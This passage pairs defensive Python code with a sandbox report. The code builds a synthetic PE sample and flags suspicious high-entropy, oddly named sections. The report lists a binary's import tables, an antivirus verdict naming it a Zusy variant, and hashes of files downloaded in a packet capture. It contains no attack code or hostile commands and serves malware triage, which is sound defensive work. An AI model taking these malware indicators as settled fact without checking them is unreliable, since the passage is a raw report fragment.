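                             0, 0, 0, 0, chars)
        blobs += payload
    return dos + b"PE\0\0" + coff + opt + table + blobs


# Constructed sections modelled on the tables above: ordinary code and data plus a
# high-entropy, oddly named, writable section in the style of tlworker.exe's .pnuvq.
_rng = random.Random(0x5EED)
SAMPLE_SPEC = [
    (b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ,
     b"\x55\x8b\xec\x83\xec\x10" * 200),
    (b".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE,
     b"\0" * 512 + b"config=1\0"),
    (b".pnuvq", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE,
     bytes(_rng.getrandbits(8) for _ in range(4096))),
]
SAMPLE_PE = build_sample_pe(SAMPLE_SPEC)


if __name__ == "__main__":
    for name, reasons in triage(parse_sections(SAMPLE_PE)).items():
        print(f"{name}: {', '.join(reasons)}")
```

Feed it the bytes of a dropped file rather than SAMPLE_PE and the first thing it settles is whether a .bmp or .so on disk is actually an executable. A flagged section is a lead, not a verdict: resource-heavy binaries legitimately carry a high-entropy .rsrc, which is why the name and characteristics are reported alongside the entropy.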
Imports (11)
KERNEL32.dll (113)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
TerminateProcess 0x0 0x4220bc 0x30d24 0x30d24 0x29e
HeapFree 0x0 0x4220c0 0x30d28 0x30d28 0x19f
HeapAlloc 0x0 0x4220c4 0x30d2c 0x30d2c 0x199
RaiseException 0x0 0x4220c8 0x30d30 0x30d30 0x20b
HeapReAlloc 0x0 0x4220cc 0x30d34 0x30d34 0x1a2
HeapSize 0x0 0x4220d0 0x30d38 0x30d38 0x1a3
GetACP 0x0 0x4220d4 0x30d3c 0x30d3c 0xb9
GetTimeZoneInformation 0x0 0x4220d8 0x30d40 0x30d40 0x170
UnhandledExceptionFilter 0x0 0x4220dc 0x30d44 0x30d44 0x2ad
FreeEnvironmentStringsA 0x0 0x4220e0 0x30d48 0x30d48 0xb2
FreeEnvironmentStringsW 0x0 0x4220e4 0x30d4c 0x30d4c 0xb3
GetEnvironmentStrings 0x0 0x4220e8 0x30d50 0x30d50 0x106
GetEnvironmentStringsW 0x0 0x4220ec 0x30d54 0x30d54 0x108
SetHandleCount 0x0 0x4220f0 0x30d58 0x30d58 0x26d
GetStdHandle 0x0 0x4220f4 0x30d5c 0x30d5c 0x152
GetFileType 0x0 0x4220f8 0x30d60 0x30d60 0x115
HeapDestroy 0x0 0x4220fc 0x30d64 0x30d64 0x19d
HeapCreate 0x0 0x422100 0x30d68 0x30d68 0x19b
VirtualFree 0x0 0x422104 0x30d6c 0x30d6c 0x2bf
ExitProcess 0x0 0x422108 0x30d70 0x30d70 0x7d
VirtualAlloc 0x0 0x42210c 0x30d74 0x30d74 0x2bb
IsBadWritePtr 0x0 0x422110 0x30d78 0x30d78 0x1b8
SetUnhandledExceptionFilter 0x0 0x422114 0x30d7c 0x30d7c 0x28b
LCMapStringA 0x0 0x422118 0x30d80 0x30d80 0x1bf
LCMapStringW 0x0 0x42211c 0x30d84 0x30d84 0x1c0
GetStringTypeA 0x0 0x422120 0x30d88 0x30d88 0x153
GetStringTypeW 0x0 0x422124 0x30d8c 0x30d8c 0x156
IsBadReadPtr 0x0 0x422128 0x30d90 0x30d90 0x1b5
IsBadCodePtr 0x0 0x42212c 0x30d94 0x30d94 0x1b2
SetStdHandle 0x0 0x422130 0x30d98 0x30d98 0x27c
CompareStringA 0x0 0x422134 0x30d9c 0x30d9c 0x21
CompareStringW 0x0 0x422138 0x30da0 0x30da0 0x22
SetEnvironmentVariableA 0x0 0x42213c 0x30da4 0x30da4 0x262
GetCommandLineA 0x0 0x422140 0x30da8 0x30da8 0xca
GetStartupInfoA 0x0 0x422144 0x30dac 0x30dac 0x150
RtlUnwind 0x0 0x422148 0x30db0 0x30db0 0x22f
GetProfileStringA 0x0 0x42214c 0x30db4 0x30db4 0x14b
FormatMessageA 0x0 0x422150 0x30db8 0x30db8 0xaf
GetFileTime 0x0 0x422154 0x30dbc 0x30dbc 0x114
GetFileSize 0x0 0x422158 0x30dc0 0x30dc0 0x112
GetFileAttributesA 0x0 0x42215c 0x30dc4 0x30dc4 0x10d
GetTickCount 0x0 0x422160 0x30dc8 0x30dc8 0x16d
FileTimeToLocalFileTime 0x0 0x422164 0x30dcc 0x30dcc 0x89
FileTimeToSystemTime 0x0 0x422168 0x30dd0 0x30dd0 0x8a
GetFullPathNameA 0x0 0x42216c 0x30dd4 0x30dd4 0x116
GetVolumeInformationA 0x0 0x422170 0x30dd8 0x30dd8 0x177
FindFirstFileA 0x0 0x422174 0x30ddc 0x30ddc 0x94
FindClose 0x0 0x422178 0x30de0 0x30de0 0x90
SetEndOfFile 0x0 0x42217c 0x30de4 0x30de4 0x261
UnlockFile 0x0 0x422180 0x30de8 0x30de8 0x2ae
LockFile 0x0 0x422184 0x30dec 0x30dec 0x1d3
FlushFileBuffers 0x0 0x422188 0x30df0 0x30df0 0xaa
SetFilePointer 0x0 0x42218c 0x30df4 0x30df4 0x26a
WriteFile 0x0 0x422190 0x30df8 0x30df8 0x2df
ReadFile 0x0 0x422194 0x30dfc 0x30dfc 0x218
CreateFileA 0x0 0x422198 0x30e00 0x30e00 0x34
GetCurrentProcess 0x0 0x42219c 0x30e04 0x30e04 0xf7
DuplicateHandle 0x0 0x4221a0 0x30e08 0x30e08 0x63
SetErrorMode 0x0 0x4221a4 0x30e0c 0x30e0c 0x264
GetOEMCP 0x0 0x4221a8 0x30e10 0x30e10 0x131
GetCPInfo 0x0 0x4221ac 0x30e14 0x30e14 0xbf
GetThreadLocale 0x0 0x4221b0 0x30e18 0x30e18 0x168
SizeofResource 0x0 0x4221b4 0x30e1c 0x30e1c 0x295
GetProcessVersion 0x0 0x4221b8 0x30e20 0x30e20 0x145
GetLastError 0x0 0x4221bc 0x30e24 0x30e24 0x11a
WritePrivateProfileStringA 0x0 0x4221c0 0x30e28 0x30e28 0x2e5
GlobalFlags 0x0 0x4221c4 0x30e2c 0x30e2c 0x187
lstrcpynA 0x0 0x4221c8 0x30e30 0x30e30 0x305
TlsGetValue 0x0 0x4221cc 0x30e34 0x30e34 0x2a4
LocalReAlloc 0x0 0x4221d0 0x30e38 0x30e38 0x1cf
TlsSetValue 0x0 0x4221d4 0x30e3c 0x30e3c 0x2a5
EnterCriticalSection 0x0 0x4221d8 0x30e40 0x30e40 0x66
GlobalReAlloc 0x0 0x4221dc 0x30e44 0x30e44 0x18f
LeaveCriticalSection 0x0 0x4221e0 0x30e48 0x30e48 0x1c1
TlsFree 0x0 0x4221e4 0x30e4c 0x30e4c 0x2a3
GlobalHandle 0x0 0x4221e8 0x30e50 0x30e50 0x18b
DeleteCriticalSection 0x0 0x4221ec 0x30e54 0x30e54 0x55
TlsAlloc 0x0 0x4221f0 0x30e58 0x30e58 0x2a2
InitializeCriticalSection 0x0 0x4221f4 0x30e5c 0x30e5c 0x1aa
LocalFree 0x0 0x4221f8 0x30e60 0x30e60 0x1cc
LocalAlloc 0x0 0x4221fc 0x30e64 0x30e64 0x1c8
MulDiv 0x0 0x422200 0x30e68 0x30e68 0x1e3
SetLastError 0x0 0x422204 0x30e6c 0x30e6c 0x271
MultiByteToWideChar 0x0 0x422208 0x30e70 0x30e70 0x1e4
WideCharToMultiByte 0x0 0x42220c 0x30e74 0x30e74 0x2d2
InterlockedIncrement 0x0 0x422210 0x30e78 0x30e78 0x1b0
InterlockedDecrement 0x0 0x422214 0x30e7c 0x30e7c 0x1ad
LoadLibraryA 0x0 0x422218 0x30e80 0x30e80 0x1c2
FreeLibrary 0x0 0x42221c 0x30e84 0x30e84 0xb4
GetVersion 0x0 0x422220 0x30e88 0x30e88 0x174
lstrcatA 0x0 0x422224 0x30e8c 0x30e8c 0x2f9
GlobalGetAtomNameA 0x0 0x422228 0x30e90 0x30e90 0x189
GlobalAddAtomA 0x0 0x42222c 0x30e94 0x30e94 0x17f
GlobalFindAtomA 0x0 0x422230 0x30e98 0x30e98 0x184
lstrcpyA 0x0 0x422234 0x30e9c 0x30e9c 0x302
GetModuleHandleA 0x0 0x422238 0x30ea0 0x30ea0 0x126
GetProcAddress 0x0 0x42223c 0x30ea4 0x30ea4 0x13e
GlobalUnlock 0x0 0x422240 0x30ea8 0x30ea8 0x193
GlobalFree 0x0 0x422244 0x30eac 0x30eac 0x188
LockResource 0x0 0x422248 0x30eb0 0x30eb0 0x1d5
FindResourceA 0x0 0x42224c 0x30eb4 0x30eb4 0xa3
LoadResource 0x0 0x422250 0x30eb8 0x30eb8 0x1c7
CloseHandle 0x0 0x422254 0x30ebc 0x30ebc 0x1b
GlobalLock 0x0 0x422258 0x30ec0 0x30ec0 0x18c
GlobalAlloc 0x0 0x42225c 0x30ec4 0x30ec4 0x181
GlobalDeleteAtom 0x0 0x422260 0x30ec8 0x30ec8 0x183
lstrcmpA 0x0 0x422264 0x30ecc 0x30ecc 0x2fc
lstrcmpiA 0x0 0x422268 0x30ed0 0x30ed0 0x2ff
GetCurrentThread 0x0 0x42226c 0x30ed4 0x30ed4 0xf9
GetCurrentThreadId 0x0 0x422270 0x30ed8 0x30ed8 0xfa
lstrlenA 0x0 0x422274 0x30edc 0x30edc 0x308
GetModuleFileNameA 0x0 0x422278 0x30ee0 0x30ee0 0x124
VirtualProtect 0x0 0x42227c 0x30ee4 0x30ee4 0x2c3
USER32.dll (126)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
SetRect 0x0 0x4222b4 0x30f1c 0x30f1c 0x244
GetNextDlgGroupItem 0x0 0x4222b8 0x30f20 0x30f20 0x132
MessageBeep 0x0 0x4222bc 0x30f24 0x30f24 0x1bd
InvalidateRect 0x0 0x4222c0 0x30f28 0x30f28 0x17a
CharUpperA 0x0 0x4222c4 0x30f2c 0x30f2c 0x2f
InflateRect 0x0 0x4222c8 0x30f30 0x30f30 0x171
RegisterClipboardFormatA 0x0 0x4222cc 0x30f34 0x30f34 0x1f6
PostThreadMessageA 0x0 0x4222d0 0x30f38 0x30f38 0x1e1
SetFocus 0x0 0x4222d4 0x30f3c 0x30f3c 0x22f
AdjustWindowRectEx 0x0 0x4222d8 0x30f40 0x30f40 0x2
ScreenToClient 0x0 0x4222dc 0x30f44 0x30f44 0x20a
CopyRect 0x0 0x4222e0 0x30f48 0x30f48 0x44
GetTopWindow 0x0 0x4222e4 0x30f4c 0x30f4c 0x14c
IsChild 0x0 0x4222e8 0x30f50 0x30f50 0x185
GetCapture 0x0 0x4222ec 0x30f54 0x30f54 0xe4
WinHelpA 0x0 0x4222f0 0x30f58 0x30f58 0x2a6
wsprintfA 0x0 0x4222f4 0x30f5c 0x30f5c 0x2ac
GetClassInfoA 0x0 0x4222f8 0x30f60 0x30f60 0xe7
RegisterClassA 0x0 0x4222fc 0x30f64 0x30f64 0x1f2
GetMenu 0x0 0x422300 0x30f68 0x30f68 0x11c
GetMenuItemCount 0x0 0x422304 0x30f6c 0x30f6c 0x122
GetSubMenu 0x0 0x422308 0x30f70 0x30f70 0x142
GetMenuItemID 0x0 0x42230c 0x30f74 0x30f74 0x123
GetWindowTextLengthA 0x0 0x422310 0x30f78 0x30f78 0x15f
GetWindowTextA 0x0 0x422314 0x30f7c 0x30f7c 0x15e
GetDlgCtrlID 0x0 0x422318 0x30f80 0x30f80 0x101
DefWindowProcA 0x0 0x42231c 0x30f84 0x30f84 0x84
CreateWindowExA 0x0 0x422320 0x30f88 0x30f88 0x59
GetClassLongA 0x0 0x422324 0x30f8c 0x30f8c 0xeb
SetPropA 0x0 0x422328 0x30f90 0x30f90 0x242
UnhookWindowsHookEx 0x0 0x42232c 0x30f94 0x30f94 0x286
GetPropA 0x0 0x422330 0x30f98 0x30f98 0x13a
CallWindowProcA 0x0 0x422334 0x30f9c 0x30f9c 0x16
RemovePropA 0x0 0x422338 0x30fa0 0x30fa0 0x205
CopyAcceleratorTableA 0x0 0x42233c 0x30fa4 0x30fa4 0x40
GetMessagePos 0x0 0x422340 0x30fa8 0x30fa8 0x12c
GetForegroundWindow 0x0 0x422344 0x30fac 0x30fac 0x108
GetClassNameA 0x0 0x422348 0x30fb0 0x30fb0 0xed
SetWindowLongA 0x0 0x42234c 0x30fb4 0x30fb4 0x258
RegisterWindowMessageA 0x0 0x422350 0x30fb8 0x30fb8 0x200
OffsetRect 0x0 0x422354 0x30fbc 0x30fbc 0x1d2
IntersectRect 0x0 0x422358 0x30fc0 0x30fc0 0x179
SystemParametersInfoA 0x0 0x42235c 0x30fc4 0x30fc4 0x271
GetWindowPlacement 0x0 0x422360 0x30fc8 0x30fc8 0x15b
GetWindowRect 0x0 0x422364 0x30fcc 0x30fcc 0x15c
MapDialogRect 0x0 0x422368 0x30fd0 0x30fd0 0x1b4
SetWindowPos 0x0 0x42236c 0x30fd4 0x30fd4 0x25b
GetWindow 0x0 0x422370 0x30fd8 0x30fd8 0x152
SetWindowContextHelpId 0x0 0x422374 0x30fdc 0x30fdc 0x257
EndDialog 0x0 0x422378 0x30fe0 0x30fe0 0xb9
SetActiveWindow 0x0 0x42237c 0x30fe4 0x30fe4 0x21c
IsWindow 0x0 0x422380 0x30fe8 0x30fe8 0x18f
CreateDialogIndirectParamA 0x0 0x422384 0x30fec 0x30fec 0x4c
GetDlgItem 0x0 0x422388 0x30ff0 0x30ff0 0x102
GetMenuCheckMarkDimensions 0x0 0x42238c 0x30ff4 0x30ff4 0x11e
LoadBitmapA 0x0 0x422390 0x30ff8 0x30ff8 0x198
GetMenuState 0x0 0x422394 0x30ffc 0x30ffc 0x127
ModifyMenuA 0x0 0x422398 0x31000 0x31000 0x1c4
SetMenuItemBitmaps 0x0 0x42239c 0x31004 0x31004 0x239
CheckMenuItem 0x0 0x4223a0 0x31008 0x31008 0x34
EnableMenuItem 0x0 0x4223a4 0x3100c 0x3100c 0xb5
GetFocus 0x0 0x4223a8 0x31010 0x31010 0x107
GetNextDlgTabItem 0x0 0x4223ac 0x31014 0x31014 0x133
GetMessageA 0x0 0x4223b0 0x31018 0x31018 0x12a
TranslateMessage 0x0 0x4223b4 0x3101c 0x3101c 0x282
DispatchMessageA 0x0 0x4223b8 0x31020 0x31020 0x95
GetActiveWindow 0x0 0x4223bc 0x31024 0x31024 0xdd
GetKeyState 0x0 0x4223c0 0x31028 0x31028 0x112
CallNextHookEx 0x0 0x4223c4 0x3102c 0x3102c 0x15
ValidateRect 0x0 0x4223c8 0x31030 0x31030 0x29a
IsWindowVisible 0x0 0x4223cc 0x31034 0x31034 0x192
PeekMessageA 0x0 0x4223d0 0x31038 0x31038 0x1dc
GetCursorPos 0x0 0x4223d4 0x3103c 0x3103c 0xfc
SetWindowsHookExA 0x0 0x4223d8 0x31040 0x31040 0x262
EnumChildWindows 0x0 0x4223dc 0x31044 0x31044 0xbd
GetSystemMetrics 0x0 0x4223e0 0x31048 0x31048 0x146
DrawIcon 0x0 0x4223e4 0x3104c 0x3104c 0xa9
UnregisterClassA 0x0 0x4223e8 0x31050 0x31050 0x28b
HideCaret 0x0 0x4223ec 0x31054 0x31054 0x166
ShowCaret 0x0 0x4223f0 0x31058 0x31058 0x265
ExcludeUpdateRgn 0x0 0x4223f4 0x3105c 0x3105c 0xd2
DrawFocusRect 0x0 0x4223f8 0x31060 0x31060 0xa6
GetParent 0x0 0x4223fc 0x31064 0x31064 0x135
GetLastActivePopup 0x0 0x422400 0x31068 0x31068 0x119
IsWindowEnabled 0x0 0x422404 0x3106c 0x3106c 0x190
GetWindowLongA 0x0 0x422408 0x31070 0x31070 0x156
MessageBoxA 0x0 0x42240c 0x31074 0x31074 0x1be
SetCursor 0x0 0x422410 0x31078 0x31078 0x226
PostQuitMessage 0x0 0x422414 0x3107c 0x3107c 0x1e0
PostMessageA 0x0 0x422418 0x31080 0x31080 0x1de
LoadIconA 0x0 0x42241c 0x31084 0x31084 0x19e
EnableWindow 0x0 0x422420 0x31088 0x31088 0xb7
GetClientRect 0x0 0x422424 0x3108c 0x3108c 0xf0
IsIconic 0x0 0x422428 0x31090 0x31090 0x18c
CharNextA 0x0 0x42242c 0x31094 0x31094 0x25
GetSysColorBrush 0x0 0x422430 0x31098 0x31098 0x144
GetMessageTime 0x0 0x422434 0x3109c 0x3109c 0x12d
GetSystemMenu 0x0 0x422438 0x310a0 0x310a0 0x145
SendMessageA 0x0 0x42243c 0x310a4 0x310a4 0x214
DefDlgProcA 0x0 0x422440 0x310a8 0x310a8 0x7e
IsWindowUnicode 0x0 0x422444 0x310ac 0x310ac 0x191
AppendMenuA 0x0 0x422448 0x310b0 0x310b0 0x7
GetDesktopWindow 0x0 0x42244c 0x310b4 0x310b4 0xff
LoadCursorA 0x0 0x422450 0x310b8 0x310b8 0x19a
DestroyMenu 0x0 0x422454 0x310bc 0x310bc 0x8d
GrayStringA 0x0 0x422458 0x310c0 0x310c0 0x164
DrawTextA 0x0 0x42245c 0x310c4 0x310c4 0xaf
TabbedTextOutA 0x0 0x422460 0x310c8 0x310c8 0x273
EndPaint 0x0 0x422464 0x310cc 0x310cc 0xbb
BeginPaint 0x0 0x422468 0x310d0 0x310d0 0xc
GetWindowDC 0x0 0x42246c 0x310d4 0x310d4 0x154
ReleaseDC 0x0 0x422470 0x310d8 0x310d8 0x203
GetDC 0x0 0x422474 0x310dc 0x310dc 0xfd
ClientToScreen 0x0 0x422478 0x310e0 0x310e0 0x3a
LoadStringA 0x0 0x42247c 0x310e4 0x310e4 0x1ab
ShowWindow 0x0 0x422480 0x310e8 0x310e8 0x26a
MoveWindow 0x0 0x422484 0x310ec 0x310ec 0x1c9
SetWindowTextA 0x0 0x422488 0x310f0 0x310f0 0x25e
IsDialogMessageA 0x0 0x42248c 0x310f4 0x310f4 0x188
GetSysColor 0x0 0x422490 0x310f8 0x310f8 0x143
DestroyWindow 0x0 0x422494 0x310fc 0x310fc 0x8e
PtInRect 0x0 0x422498 0x31100 0x31100 0x1ea
UpdateWindow 0x0 0x42249c 0x31104 0x31104 0x291
SendDlgItemMessageA 0x0 0x4224a0 0x31108 0x31108 0x20f
SetForegroundWindow 0x0 0x4224a4 0x3110c 0x3110c 0x230
MapWindowPoints 0x0 0x4224a8 0x31110 0x31110 0x1b9
GDI32.dll (39)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
SetMapMode 0x0 0x42201c 0x30c84 0x30c84 0x1e2
SetViewportOrgEx 0x0 0x422020 0x30c88 0x30c88 0x1f6
OffsetViewportOrgEx 0x0 0x422024 0x30c8c 0x30c8c 0x18c
SetViewportExtEx 0x0 0x422028 0x30c90 0x30c90 0x1f5
ScaleViewportExtEx 0x0 0x42202c 0x30c94 0x30c94 0x1c1
SetWindowExtEx 0x0 0x422030 0x30c98 0x30c98 0x1f9
ScaleWindowExtEx 0x0 0x422034 0x30c9c 0x30c9c 0x1c2
IntersectClipRect 0x0 0x422038 0x30ca0 0x30ca0 0x180
DeleteObject 0x0 0x42203c 0x30ca4 0x30ca4 0x53
GetDeviceCaps 0x0 0x422040 0x30ca8 0x30ca8 0x125
GetViewportExtEx 0x0 0x422044 0x30cac 0x30cac 0x178
GetWindowExtEx 0x0 0x422048 0x30cb0 0x30cb0 0x17b
CreateSolidBrush 0x0 0x42204c 0x30cb4 0x30cb4 0x4d
PtVisible 0x0 0x422050 0x30cb8 0x30cb8 0x1aa
RectVisible 0x0 0x422054 0x30cbc 0x30cbc 0x1ae
TextOutA 0x0 0x422058 0x30cc0 0x30cc0 0x205
ExtTextOutA 0x0 0x42205c 0x30cc4 0x30cc4 0x9e
Escape 0x0 0x422060 0x30cc8 0x30cc8 0x95
GetTextColor 0x0 0x422064 0x30ccc 0x30ccc 0x169
GetBkColor 0x0 0x422068 0x30cd0 0x30cd0 0x107
DPtoLP 0x0 0x42206c 0x30cd4 0x30cd4 0x4e
LPtoDP 0x0 0x422070 0x30cd8 0x30cd8 0x182
GetMapMode 0x0 0x422074 0x30cdc 0x30cdc 0x147
PatBlt 0x0 0x422078 0x30ce0 0x30ce0 0x194
SetBkMode 0x0 0x42207c 0x30ce4 0x30ce4 0x1ce
GetStockObject 0x0 0x422080 0x30ce8 0x30ce8 0x15f
SelectObject 0x0 0x422084 0x30cec 0x30cec 0x1c7
RestoreDC 0x0 0x422088 0x30cf0 0x30cf0 0x1b9
SaveDC 0x0 0x42208c 0x30cf4 0x30cf4 0x1c0
DeleteDC 0x0 0x422090 0x30cf8 0x30cf8 0x50
GetObjectA 0x0 0x422094 0x30cfc 0x30cfc 0x14f
SetBkColor 0x0 0x422098 0x30d00 0x30d00 0x1cd
SetTextColor 0x0 0x42209c 0x30d04 0x30d04 0x1f3
GetClipBox 0x0 0x4220a0 0x30d08 0x30d08 0x11a
CreateDIBitmap 0x0 0x4220a4 0x30d0c 0x30d0c 0x30
GetTextExtentPointA 0x0 0x4220a8 0x30d10 0x30d10 0x170
BitBlt 0x0 0x4220ac 0x30d14 0x30d14 0x11
CreateCompatibleDC 0x0 0x4220b0 0x30d18 0x30d18 0x2a
CreateBitmap 0x0 0x4220b4 0x30d1c 0x30d1c 0x24
comdlg32.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetFileTitleA 0x0 0x4224c0 0x31128 0x31128 0x7
WINSPOOL.DRV (3)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
ClosePrinter 0x0 0x4224b0 0x31118 0x31118 0x1c
DocumentPropertiesA 0x0 0x4224b4 0x3111c 0x3111c 0x47
OpenPrinterA 0x0 0x4224b8 0x31120 0x31120 0x7c
ADVAPI32.dll (4)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
RegCloseKey 0x0 0x422000 0x30c68 0x30c68 0x15b
RegOpenKeyExA 0x0 0x422004 0x30c6c 0x30c6c 0x172
RegSetValueExA 0x0 0x422008 0x30c70 0x30c70 0x186
RegCreateKeyExA 0x0 0x42200c 0x30c74 0x30c74 0x15f
COMCTL32.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
(by ordinal) 0x11 0x422014 0x30c7c 0x30c7c -
oledlg.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
(by ordinal) 0x8 0x422508 0x31170 0x31170 -
ole32.dll (15)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CoFreeUnusedLibraries 0x0 0x4224c8 0x31130 0x31130 0x16
OleInitialize 0x0 0x4224cc 0x31134 0x31134 0xc9
CoTaskMemAlloc 0x0 0x4224d0 0x31138 0x31138 0x4e
CoTaskMemFree 0x0 0x4224d4 0x3113c 0x3113c 0x4f
CreateILockBytesOnHGlobal 0x0 0x4224d8 0x31140 0x31140 0x60
StgCreateDocfileOnILockBytes 0x0 0x4224dc 0x31144 0x31144 0xfe
StgOpenStorageOnILockBytes 0x0 0x4224e0 0x31148 0x31148 0x10a
CoGetClassObject 0x0 0x4224e4 0x3114c 0x3114c 0x1c
CLSIDFromString 0x0 0x4224e8 0x31150 0x31150 0x6
CLSIDFromProgID 0x0 0x4224ec 0x31154 0x31154 0x5
CoRegisterMessageFilter 0x0 0x4224f0 0x31158 0x31158 0x40
CoRevokeClassObject 0x0 0x4224f4 0x3115c 0x3115c 0x47
OleFlushClipboard 0x0 0x4224f8 0x31160 0x31160 0xc4
OleIsCurrentClipboard 0x0 0x4224fc 0x31164 0x31164 0xcb
OleUninitialize 0x0 0x422500 0x31168 0x31168 0xe0
OLEPRO32.DLL (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
(by ordinal) 0xfd 0x4222ac 0x30f14 0x30f14 -
OLEAUT32.dll (9)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
VariantTimeToSystemTime 0xb9 0x422284 0x30eec 0x30eec -
SysAllocStringLen 0x4 0x422288 0x30ef0 0x30ef0 -
SysFreeString 0x6 0x42228c 0x30ef4 0x30ef4 -
VariantCopy 0xa 0x422290 0x30ef8 0x30ef8 -
VariantChangeType 0xc 0x422294 0x30efc 0x30efc -
SysAllocString 0x2 0x422298 0x30f00 0x30f00 -
SysAllocStringByteLen 0x96 0x42229c 0x30f04 0x30f04 -
SysStringLen 0x7 0x4222a0 0x30f08 0x30f08 -
VariantClear 0x9 0x4222a4 0x30f0c 0x30f0c -
Local AV Matches (1)
Threat Name Severity
Gen:Variant.Zusy.308149
Malicious
0c26b620ab8e6837cbb9527f79a4cd029243b0da2f72c420f257fc4a2c6f4b44  Downloaded File  Text  Unknown
Parent File analysis.pcap
Mime Type text/html
File Size 1.04 KB
MD5 335fafc74a1d3a0caebc3e1896c46351
SHA1 2081f4a1c334b5b498155f5629923f89c16325a6
SHA256 0c26b620ab8e6837cbb9527f79a4cd029243b0da2f72c420f257fc4a2c6f4b44
SSDeep 24:2dmMPmIAvy45SUtXYuwxvqmrxrqTt+YVbOr:cVmIAqySCYuQlowQm
ImpHash -
7017296fe4621fb5765b17dfc94485c7663d18f3cc35159f368899a55cce4ee5  Downloaded File  Text  Unknown
Parent File analysis.pcap
Mime Type text/plain
File Size 67 Bytes
MD5 7955497d0248dbb62f643c3a5a62def5
SHA1 1ea45f4793f6ac81f252a74dfd6a2423bd66b612
SHA256 7017296fe4621fb5765b17dfc94485c7663d18f3cc35159f368899a55cce4ee5
SSDeep 3:A7G0FDTa26XJT4W8YMlgh0Dec:A7G0NDaeYMlVp
ImpHash -